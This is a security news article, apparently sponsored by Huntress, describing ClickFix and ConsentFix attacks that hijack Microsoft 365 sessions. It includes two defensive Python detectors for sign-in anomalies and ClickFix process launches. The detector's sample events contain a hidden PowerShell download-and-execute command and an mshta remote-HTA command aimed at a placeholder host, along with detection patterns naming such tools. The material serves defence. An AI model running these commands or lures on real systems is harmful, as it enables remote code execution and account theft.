
Microsoft 365 Accounts Hijacked in 3 Seconds via ConsentFix & ClickFix

Originally published on: July 3, 2026
Summary

– Modern cyberattacks like ClickFix and ConsentFix succeed by embedding malicious steps into routine user workflows, bypassing traditional security awareness.
– ConsentFix targets Microsoft 365 by tricking users into dragging a localhost callback link into a browser; the link hands the attacker the OAuth tokens of a session the victim has already authenticated, so neither the password nor MFA is ever challenged again.
– A detailed walkthrough of ConsentFix was posted on a public Russian cybercrime forum in early March 2026, including code and tutorials, lowering the barrier for attackers.
– These attacks exploit trained user habits, such as breezing through CAPTCHAs or sign-in prompts, to execute commands or steal sessions through seemingly normal actions.
– Defenders need endpoint and identity monitoring to detect traces like unusual PowerShell activity or unexpected logins, as awareness alone is insufficient against these engineered attacks.

It starts with a simple, seemingly harmless action: dragging a link into your browser. In just three seconds, a threat actor can capture the tokens needed to hijack your Microsoft 365 account. You never typed a password into a fake login page, and you never violated any rule from traditional security awareness training. You simply followed a set of instructions that looked perfectly normal.

This is the hallmark of modern cybercrime. It doesn’t break down the door. Instead, it slips quietly into the middle of your everyday workflow, turning a routine action into the moment everything goes wrong.

Why These Attacks Keep Working

These attacks succeed because of the habits we’ve all developed online. Clicking through CAPTCHAs, accepting cookie prompts, pressing a key combination to move a process along. That trained reflex is exactly what attackers are counting on.

This is the core mechanism behind ClickFix attacks. Victims see a fake prompt, typically a CAPTCHA or a "fix this error" page, instructing them to press a specific sequence of keyboard shortcuts. The lure page has already placed a command on the clipboard; the shortcuts open a run prompt, paste that command, and execute it on the victim's own machine. There is no software vulnerability to exploit and no perimeter control to defeat, because the user runs the attacker's code themselves. Just a convincing lie inserted at the right moment.

ClickFix surged in 2025 and remains a potent threat, but attackers have already evolved the concept into something more sophisticated.

Figure 1 below shows the ClickFix-style fake verification prompt.

[Figure 1: In a ClickFix attack, the victim follows fake verification steps that ultimately trigger malicious code on their own machine.]

A New Attack Variant Targeting Microsoft 365 Sessions

The newer variant, ConsentFix, shifts the attack surface to Microsoft 365’s OAuth consent flows. These are the sign-in prompts that users have learned to breeze through without much scrutiny.

The setup is deceptively clean. A phishing lure arrives, often delivered through trusted platforms like Dropbox or DocSend, sometimes behind a password that makes it harder for security tooling to inspect the content.

The victim clicks through, encounters what looks like a standard Microsoft authentication screen, and is asked to complete the process by dragging a localhost callback link into the browser.

That drag-and-drop step is the trap. In a standard OAuth authorization-code flow, a localhost redirect is meant for an application listening on the user's own machine; the callback link carries the authorization response, and whoever receives it can exchange it for tokens. Instead of finishing a harmless authentication step, the user hands that response to the attacker, who redeems it for session access to email and other Microsoft 365 services. The victim has already entered their password and satisfied multi-factor authentication (MFA) on the genuine Microsoft sign-in page, so the stolen session inherits those checks and the attacker is never challenged for either.

The victim isn’t typing credentials into a fake form. They are completing what appears to be a legitimate authentication flow, and the session itself is what gets stolen.

Figure 2 below shows how ConsentFix turns what looks like a normal Microsoft 365 sign-in step into session theft.

[Figure 2: ConsentFix hijacks the Microsoft 365 sign-in flow by turning a familiar user action into stolen session access.]
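The identity-side trace of a ConsentFix-style handover, and the "new session logins from unexpected locations" signal the mitigation section refers to, as an added example that is not from the original article or from Huntress: a small Python detector run over constructed sign-in records. The record fields (user, ts, ip, country, interactive, client) are only loosely modelled on Entra ID sign-in logs, and the 15-minute window and the "different IP in a different country" test are tuning assumptions.

```python
"""Flag Microsoft 365 sign-in sequences that look like a stolen session in use.

Added illustration, not Huntress's or Microsoft's code. SignIn is a constructed,
simplified stand-in for Entra ID sign-in log records; the 15-minute window and
the different-IP-and-country test are tuning assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class SignIn:
    user: str
    ts: datetime
    ip: str
    country: str
    interactive: bool   # True: the user completed a browser sign-in (password + MFA)
    client: str         # application or agent that presented the token


WINDOW = timedelta(minutes=15)  # assumption: tune to your environment


def flag_session_theft(events, window=WINDOW):
    """Return (victim_signin, suspicious_use) pairs.

    Heuristic: an interactive sign-in (where MFA was satisfied) followed within
    `window` by a non-interactive token use for the same user from a different
    public IP in a different country. The stolen session carries the MFA claim
    from the victim's own sign-in, so the attacker is never challenged; what
    gives it away is that the session is used, almost immediately, from
    infrastructure the victim is not on.
    """
    by_user = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_user.setdefault(ev.user, []).append(ev)

    findings = []
    for evs in by_user.values():
        for i, anchor in enumerate(evs):
            if not anchor.interactive:
                continue
            for later in evs[i + 1:]:
                if later.ts - anchor.ts > window:
                    break  # events are sorted; nothing further is inside the window
                if (not later.interactive
                        and later.ip != anchor.ip
                        and later.country != anchor.country):
                    findings.append((anchor, later))
    return findings


def describe(finding):
    """One-line analyst summary of a finding."""
    victim, use = finding
    return (f"{victim.user}: interactive sign-in from {victim.ip} ({victim.country}) at "
            f"{victim.ts:%H:%M}, token used from {use.ip} ({use.country}) by "
            f"{use.client} at {use.ts:%H:%M}")


# Constructed sample: TEST-NET addresses and invented users, not real telemetry.
T = datetime(2026, 3, 4, 9, 0)
SAMPLE_EVENTS = [
    SignIn("alice", T, "203.0.113.10", "US", True, "Browser"),
    SignIn("alice", T + timedelta(minutes=2), "198.51.100.7", "NL", False, "Desktop client"),
    SignIn("bob", T + timedelta(minutes=5), "203.0.113.20", "US", True, "Browser"),
    SignIn("bob", T + timedelta(minutes=6), "203.0.113.20", "US", False, "Outlook"),
    SignIn("carol", T - timedelta(hours=1), "203.0.113.30", "US", True, "Browser"),
    SignIn("carol", T + timedelta(hours=2), "192.0.2.8", "DE", False, "Outlook"),
]

if __name__ == "__main__":
    for hit in flag_session_theft(SAMPLE_EVENTS):
        print(describe(hit))
```

Only alice is flagged: bob's token use comes from the same address, and carol's comes hours later. Treat a hit as a lead rather than a verdict, since mobile carriers and VPN egress points change a user's apparent location, and respond by revoking the user's sessions and refresh tokens rather than by resetting a password the attacker never had.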

Criminals Are Sharing the Blueprint Openly

By early March 2026, a detailed walkthrough of ConsentFix had been posted to a public Russian cybercrime forum. It included working code, infrastructure screenshots, and a video tutorial showing exactly how to build and deploy the attack.

The infrastructure relied on free or widely available services. The post also outlined how attackers profile targets before sending a single phishing message, using LinkedIn and similar tools to map organizations and tailor lures to real people.

What was once a technique requiring meaningful technical skill now comes packaged with documentation and step-by-step guidance. The barrier to entry keeps dropping.

How to Reduce Your Exposure

Awareness still has a role. These attacks depend on people moving through familiar workflows without pausing. Asking why a website wants you to press hotkeys or drag a strange link into a browser is often enough to short-circuit the whole thing.

But awareness alone won’t close the gap, because these attacks are specifically engineered to look routine. Defenders also need detection coverage for the traces they leave behind: unusual PowerShell activity originating from normal user processes, or new session logins from unexpected locations.

Endpoint and identity monitoring can surface those signals before a brief lapse in judgment snowballs into a full account compromise.
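An endpoint-side companion for the ClickFix pattern described earlier and for the "unusual PowerShell activity originating from normal user processes" signal above, as an added example (not the article's or Huntress's code): Python that scores constructed process-creation events. The field names are modelled loosely on Sysmon Event ID 1 / Windows Security 4688; treating explorer.exe as the parent of commands entered in the Run dialog assumes the default Windows shell; and the command-line indicators are assumptions drawn from commonly observed lures, not from any one campaign.

```python
"""Score Windows process-creation events for the ClickFix execution pattern.

Added illustration, not the article's or Huntress's code. ProcEvent is a
constructed stand-in for Sysmon Event ID 1 / Security 4688 fields. Assumptions:
commands entered in the Win+R Run dialog are spawned by explorer.exe (the
default shell), and the command-line indicators below are drawn from commonly
observed lures rather than from a specific campaign.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# Interpreters a ClickFix lure typically has the victim launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Parents that mean a person typed or pasted the command rather than a service or task.
USER_FACING_PARENTS = {"explorer.exe"}

# Traits that do not belong in a command a user would type by hand.
SUSPICIOUS = [
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression"),
    (re.compile(r"downloadstring|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|\bcurl\b", re.I),
     "remote fetch"),
    (re.compile(r"https?://", re.I), "URL in command line"),
    (re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I), "mshta loading a remote HTA"),
    # Lures often append a reassuring comment so the Run box displays "I am not a robot".
    (re.compile(r"#.*(?:captcha|verif|robot|human)", re.I), "fake-verification comment"),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the reasons an event looks like ClickFix, or [] if it does not."""
    if _basename(ev.image) not in INTERPRETERS:
        return []
    from_shell = _basename(ev.parent_image) in USER_FACING_PARENTS
    reasons = [label for pat, label in SUSPICIOUS if pat.search(ev.command_line)]
    # Require both: administrators do open PowerShell from Explorer, and scheduled
    # scripts do use -enc, but a desktop-launched interpreter whose command line
    # also carries payload traits is exactly what the victim's keystrokes produce.
    if from_shell and reasons:
        return ["launched from the desktop shell (Run dialog / Explorer)"] + reasons
    return []


def hunt(events):
    """Return (event, reasons) for every event that scores."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev, reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"

# Constructed sample events; example.invalid is a reserved name that never resolves.
SAMPLE_EVENTS = [
    ProcEvent("ws-01", "alice", EXPLORER, PS,
              'powershell -w hidden -c "iex (irm https://example.invalid/verify)" '
              '# I am not a robot - reCAPTCHA Verification ID: 7421'),
    ProcEvent("ws-02", "bob", EXPLORER, PS, f'"{PS}"'),  # an admin simply opened a console
    ProcEvent("ws-03", "SYSTEM", SVCHOST, PS,
              "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"),
    ProcEvent("ws-04", "dave", EXPLORER, r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/c/verify.hta"),
]

if __name__ == "__main__":
    for ev, reasons in hunt(SAMPLE_EVENTS):
        print(f"{ev.host} {ev.user}: {', '.join(reasons)}")
```

Only ws-01 and ws-04 score: the bare PowerShell console on ws-02 has no payload traits, and the scheduled script on ws-03 was not launched from the desktop shell. The same logic translates directly into a SIEM or EDR query on parent image plus command line; for after-the-fact confirmation on a host, the Run dialog keeps its history under the user's RunMRU registry key, which preserves the pasted command even if the process event was never collected.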

The attacker’s job is to interrupt a normal workflow at exactly the right moment and let the victim do the rest. Understanding that pattern is the first step toward stopping it.

Tradecraft Tuesday: No Products. No Pitches. Just Hacks.

Tradecraft Tuesday provides cybersecurity professionals with an in-depth analysis of the latest threat actors, attack vectors, and mitigation strategies. Each weekly session features technical walkthroughs of recent incidents, comprehensive breakdowns of malware trends, and up-to-date indicators of compromise (IOCs).

Participants gain:

  • Detailed briefings on emerging threat campaigns and ransomware variants

Advance your defensive posture with real-time intelligence and technical education specifically designed for those responsible for safeguarding their organization’s environment.

Sponsored and written by Huntress Labs.
(Source: BleepingComputer)
